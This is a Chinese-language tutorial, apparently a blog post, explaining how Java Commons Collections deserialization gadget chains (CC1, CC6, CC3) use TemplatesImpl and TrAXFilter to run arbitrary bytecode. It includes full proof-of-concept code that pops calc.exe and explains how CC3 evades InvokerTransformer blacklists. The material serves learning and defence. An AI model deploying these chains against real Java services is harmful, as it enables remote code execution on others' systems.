一、前言

在前文中，我們學(xué)習(xí)了Java的類加載過(guò)程，類加載器以及Java中加載字節(jié)碼的一些方法，其中介紹了TemplatesImpl，TemplatesImpl是一個(gè)可以加載字節(jié)碼的類，通過(guò)調(diào)用其newTransformer()方法，即可執(zhí)行這段字節(jié)碼的類構(gòu)造器。 那么，在反序列化的漏洞，能否利用這個(gè)特性執(zhí)行任意代碼呢？

二、回顧C(jī)C1和CC6

在CC1的利用鏈中，TransformedMap 是在寫(xiě)入的 時(shí)候執(zhí)行 transform，其中利用點(diǎn)是通過(guò) sun.reflect.annotation.AnnotationInvocationHandler#readObject 方法達(dá)到寫(xiě)入的目的，從而執(zhí)行transform；? LazyMap則是在其get方法中執(zhí)行 factory.transform，但是 sun.reflect.annotation.AnnotionInvocationHandler#readObject方法并沒(méi)有直接調(diào)用get方法，而是在其invoke方法中有調(diào)用，故而用到了Proxy代理方式實(shí)現(xiàn)在readObject時(shí)調(diào)用invoke，達(dá)到執(zhí)行transform的目的。

但是在CC1鏈中，因?yàn)樵贘ava 8u71之后的版本改動(dòng)了sun.reflect.annotation.AnnotationInvocationHandler#readObject 方法，不在直接使用發(fā)序列化后得到的Map對(duì)象，而是新建了一個(gè)LinkedHashMap對(duì)象，并將原來(lái)的鍵值加進(jìn)去，所以我們精心構(gòu)造的Map不在執(zhí)行set或put操作，也就不會(huì)觸發(fā)RCE了。

1、使用TemlatesImpl 構(gòu)造 CC1鏈

環(huán)境信息：
java 7u61

commons-collections 3.2.1

我們先回憶下 CommonCollections1的利用鏈 ，當(dāng)時(shí)可以利用TransformedMap執(zhí)行任意Java方法

CommonCollections1.javapackage com.vulhub.Ser;import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;public class CommonCollections1 {public static void main(String[] args) throws Exception {Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{ String.class, Class[].class}, new Object[]{"getRuntime", new Class[0] }),new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),new InvokerTransformer("exec", new Class[]{String.class},new String[]{"calc.exe"}),};Transformer transformerChain = new ChainedTransformer(transformers);Map innerMap = new HashMap();innerMap.put("value", "xxxx");Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);construct.setAccessible(true);Object obj = construct.newInstance(Retention.class, outerMap);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(obj);oos.close();System.out.println(barr);ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o = (Object)ois.readObject();}
}

而在上一節(jié) java動(dòng)態(tài)加載字節(jié)碼的學(xué)習(xí)中， 我們又學(xué)習(xí)了如何利用TemplatesImpl執(zhí)行字節(jié)碼

public static void main(String[] args) throws Exception {
// source: bytecodes/HelloTemplateImpl.javabyte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEA" +"CXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RP" +"TTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0" +"aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCm" +"KExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29y" +"Zy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2Fw" +"YWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxp" +"bml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAb" +"DAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwB" +"AEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFj" +"dFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5z" +"bGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3Ry" +"ZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5n" +"OylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsA" +"AAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwA" +"AQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwA" +"DwABABAAAAACABE=");TemplatesImpl obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{code});setFieldValue(obj, "_name", "HelloTemplatesImpl");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());obj.newTransformer();

只需要結(jié)合這兩段POC，即可很容易的改造出一個(gè)執(zhí)行任意字節(jié)碼的CommonsCollections 利用鏈： 只需要將第一個(gè)demo中的 InvokerTransformer 執(zhí)行的方法 改成 TemplatesImpl#newTransformer()? 即可：

Transformer[] transformers = new Transformer[]{new ConstantTransformer(obj),new InvokerTransformer("newTransformer", null, null)
};

完整POC如下：

evil.java  //用于生成evil.class 類文件import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class Evil extends AbstractTranslet {public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}public Evil() throws Exception {super();System.out.println("Hello TemplatesImpl");Runtime.getRuntime().exec("calc.exe");}
}

com.vulhub.Ser.TemplatesImplToCC1.javapackage com.vulhub.Ser;import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;public class TemplatesImplToCC1 {public static void setFieldValue(Object obj, String fieldName, Object Value) throws Exception{Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, Value);}//讀取文件字節(jié)流，賦值給 TemplatesImpl#_bytecodespublic static byte[] readClassFile(String filePath) throws IOException {Path path = Paths.get(filePath);return Files.readAllBytes(path);}public static void main(String[] args) throws Exception{//source: bytecodes /evil.javabyte[] code = readClassFile("D:\\java\\test\\evil.class");TemplatesImpl obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{code});setFieldValue(obj,"_name", "evil");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());Transformer[] transformers = new Transformer[]{new ConstantTransformer(obj),new InvokerTransformer("newTransformer", null,null),};Transformer transformerChain = new ChainedTransformer(transformers);Map innerMap = new HashMap();innerMap.put("value", "xxxx");Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);construct.setAccessible(true);Object objAnonotion = construct.newInstance(Retention.class, outerMap);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(objAnonotion);oos.close();System.out.println(barr);ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o = (Object)ois.readObject();}
}

我們分析一下為什么可以這么構(gòu)造。 在學(xué)習(xí)CC1鏈的文章中，我們了解到其核心原理就是InvokerTransformer#transform ,可以執(zhí)行任意方法。 在java類加載的學(xué)習(xí)中，我們了解到 TemplatesImpl 加載字節(jié)碼 的調(diào)用鏈 中用到了 TemplatesImpl#newTransformer() 。 那么我們cc1鏈中的 exec方法改造一下，換成newTransformer() 方法，這樣就組成了一條 TemplatesImpl版的 CC1利用鏈 ，LazyMap利用的payload就省略不寫(xiě)了，參照之前的POC。 但是，因?yàn)檫€是CC1鏈，用到的還是sun.reflect.annotation.AnnotationInvocationHandler類，所以依舊限制在8u71之前才能使用。

2、使用TemplatesImpl 構(gòu)造 CC6鏈

環(huán)境信息：
java 1.8.0_261

commons-collections 3.2.1

上一章中，因?yàn)槭褂玫氖莄c1鏈，受限于jdk版本，故而其實(shí)這里我們也可以用 TemplatesImpl 構(gòu)造一版 cc6鏈的poc。測(cè)試代碼如下；

evil.java  //用于生成evil.class 類文件import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class evil extends AbstractTranslet {public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}public evil() throws Exception {super();System.out.println("Hello TemplatesImpl");Runtime.getRuntime().exec("calc.exe");}
}

TemplatesImplToCC6.javapackage com.vulhub.Ser;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;public class TemplatesImplToCC6 {public static void setFieldValue(Object obj, String fieldName, Object Value) throws Exception{Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, Value);}public static byte[] readClassFile(String filePath) throws IOException {Path path = Paths.get(filePath);return Files.readAllBytes(path);}public static void main(String[] args) throws Exception{//source: bytecodes /evil.javabyte[] code = readClassFile("D:\\java\\test\\evil.class");TemplatesImpl obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{code});setFieldValue(obj,"_name", "evil");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());Transformer[] fakeTransformers = new Transformer[]{new ConstantTransformer(1)};Transformer[] transformers = new Transformer[]{new ConstantTransformer(obj),new InvokerTransformer("newTransformer", null,null),};Transformer  transformerChain = new ChainedTransformer(fakeTransformers);Map innerMap = new HashMap();Map outerMap = LazyMap.decorate(innerMap, transformerChain);TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");Map expMap = new HashMap();expMap.put(tme,"valuevalue");outerMap.remove("keykey");setFieldValue(transformerChain,"iTransformers", transformers);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(expMap);oos.close();System.out.println(barr);ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o = (Object)ois.readObject();}}

三、為什么需要CommonsCollections3鏈呢？

在上述的說(shuō)明中，TemplatesImpl可以用于構(gòu)造CC1和CC6鏈，并且CC6鏈不受jdk版本影響，那為什么還需要CC3鏈呢？

我們可以再來(lái)看ysoserial中的CC3，可以發(fā)現(xiàn)其中沒(méi)有使?到InvokerTransformer原因是什么呢？

2015年初，@frohoff和@gebl發(fā)布了?Marshalling Pickles：how deserializing objects will ruin your day，以及反序列化利用工具yaoserial，安全開(kāi)發(fā)者自然會(huì)去尋找一種安全的過(guò)濾方法，類似SerialKiller這樣的工具隨之誕生：

SerialKiller是?個(gè)Java反序列化過(guò)濾器，可以通過(guò)?名單與?名單的?式來(lái)限制反序列化時(shí)允許通過(guò)的類。在其發(fā)布的第?個(gè)版本代碼中，我們可以看到其給出了最初的?名單

這個(gè)黑名單中InvokerTransformer 赫然在列，也就切斷了 CommonsCollections1和6的利用鏈。 ysoseria隨后增加了不少新的Gadgets， 其中就包括 CommonsCollections3.

CommonsCollections3的目的很明顯，就是為了繞過(guò)一些規(guī)則對(duì) InvokerTransformer的限制。 CommonsCollections3并沒(méi)有使用到 InvokerTransformer來(lái)調(diào)用任意方法，而是用到了另一個(gè)類， com.sun.org.apahce.xalan.internal.xsltc.trax.TrAXFilter

這個(gè)類的構(gòu)造方法中調(diào)用（TransformerImpl） templates.newTransformer() ，免去了我們使用InvokerTransformer手工調(diào)用newTransformer() 方法這一步

當(dāng)然，這里缺少了 InvokerTransformer， TrAXFilter 的構(gòu)造方法也無(wú)法調(diào)用。所以我們需要找到一個(gè)地方，能實(shí)現(xiàn)調(diào)用?com.sun.org.apahce.xalan.internal.xsltc.trax.TrAXFilter? 的構(gòu)造方法。 那就是 org.apache.commons.collections.functors.InstantiateTransformer 。InstantiateTransformer 也是一個(gè)實(shí)現(xiàn)了Transformer接口的類， 他的作用就是調(diào)用構(gòu)造方法。

所以，我們實(shí)現(xiàn)的目標(biāo)就是，利用 InstantiateTransformer 來(lái)調(diào)用 TrAXFilter 的構(gòu)造方法， 再利用其構(gòu)造方法里的 templates.newTransformer()? 調(diào)用到 TemplatesImpl 里的字節(jié)碼。

CommonsCollections3利用鏈poc示例：

環(huán)境信息：
java 1.8.0_261

commons-collections 3.2.1

evil.java  //用于生成evil.class 類文件import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class evil extends AbstractTranslet {public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}public evil() throws Exception {super();System.out.println("Hello TemplatesImpl");Runtime.getRuntime().exec("calc.exe");}
}

CommonCollections3.javapackage com.vulhub.Ser;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;public class CommonCollections3 {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static byte[] readClassFile(String filePath) throws IOException {Path path = Paths.get(filePath);return Files.readAllBytes(path);}public static void main(String[] args) throws Exception{TemplatesImpl obj = new TemplatesImpl();setFieldValue(obj,"_bytecodes", new byte[][]{ readClassFile("D:\\java\\test\\evil.class")});setFieldValue(obj,"_name","evil");setFieldValue(obj,"_tfactory", new TransformerFactoryImpl());Transformer[] fakeTransformers = new Transformer[]{new ConstantTransformer(1)};Transformer[] transformers = new Transformer[]{new ConstantTransformer(TrAXFilter.class),new InstantiateTransformer(new Class[] {Templates.class},new Object[]{obj})};Transformer  transformerChain = new ChainedTransformer(fakeTransformers);Map innerMap = new HashMap();Map outerMap = LazyMap.decorate(innerMap, transformerChain);TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");Map expMap = new HashMap();expMap.put(tme,"valuevalue");outerMap.remove("keykey");setFieldValue(transformerChain,"iTransformers", transformers);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(expMap);oos.close();System.out.println(barr);ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o = (Object)ois.readObject();}
}